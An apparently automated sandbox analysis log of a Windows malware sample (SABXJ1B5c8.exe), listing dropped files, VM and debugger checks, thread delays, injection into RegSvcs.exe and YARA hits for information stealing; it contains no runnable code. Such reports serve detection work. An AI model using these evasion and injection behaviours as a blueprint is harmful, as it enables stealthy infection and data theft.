            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-3883
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-3720
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_13-3882
            Source: C:\Windows\SysWOW64\perfhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-74435
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_19-3894
            Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-3881
            Source: C:\Windows\SysWOW64\perfhost.exeAPI coverage: 1.8 %
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 516Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\System32\msdtc.exe TID: 6052Thread sleep count: 482 > 30Jump to behavior
            Source: C:\Windows\System32\msdtc.exe TID: 6052Thread sleep time: -48200s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 5408Thread sleep count: 5358 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 5408Thread sleep time: -53580000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 5408Thread sleep count: 4640 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 5408Thread sleep time: -46400000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599828
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599718
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599598
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599469
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599235
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597233
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596905
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596797
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596685
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596564
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596216
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595270
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595116
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594648
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594241
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594107
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593849
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593719
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593235
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593110
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oYSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: armsvc.exe, 00000002.00000003.2059576543.000000000094B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1817901404.0000000000947000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1844349690.000000000094B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.0000000000947000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1818400375.000000000094B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2059203379.0000000000947000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
            Source: SensorDataService.exe, 00000010.00000003.1660377267.000000000057A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver0
            Source: AppVClient.exe, 00000007.00000003.1595570546.00000000004F0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000002.1596296692.000000000050E000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595659509.00000000004F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
            Source: SensorDataService.exe, 00000010.00000002.1763453967.000000000055F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer\
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: YSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SensorDataService.exe, 00000010.00000003.1660377267.000000000057A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: RegSvcs.exe, 00000011.00000002.2850939963.0000000000B06000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 00000013.00000002.2843426616.000000000041D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
            Source: SensorDataService.exe, 00000010.00000003.1660127067.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
            Source: snmptrap.exe, 00000012.00000002.2841828156.0000000000475000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_008908F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_008908F1
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00851130 mov eax, dword ptr fs:[00000030h]14_2_00851130
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_008934CD mov eax, dword ptr fs:[00000030h]14_2_008934CD
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_008908F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_008908F1
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0089420B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0089420B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9BJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9FJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 702008Jump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SABXJ1B5c8.exe"Jump to behavior
            Source: SABXJ1B5c8.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST8A25.tmp VolumeInformationJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST8A36.tmp VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00877960 GetVolumeInformationW,GetWindowsDirectoryW,CreateThread,CreateThread,GetLastError,GetWindowsDirectoryW,CreateThread,GetUserNameW,GetLastError,GetComputerNameW,CreateThread,GetVolumeInformationW,CreateThread,GetUserNameW,GetLastError,14_2_00877960
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
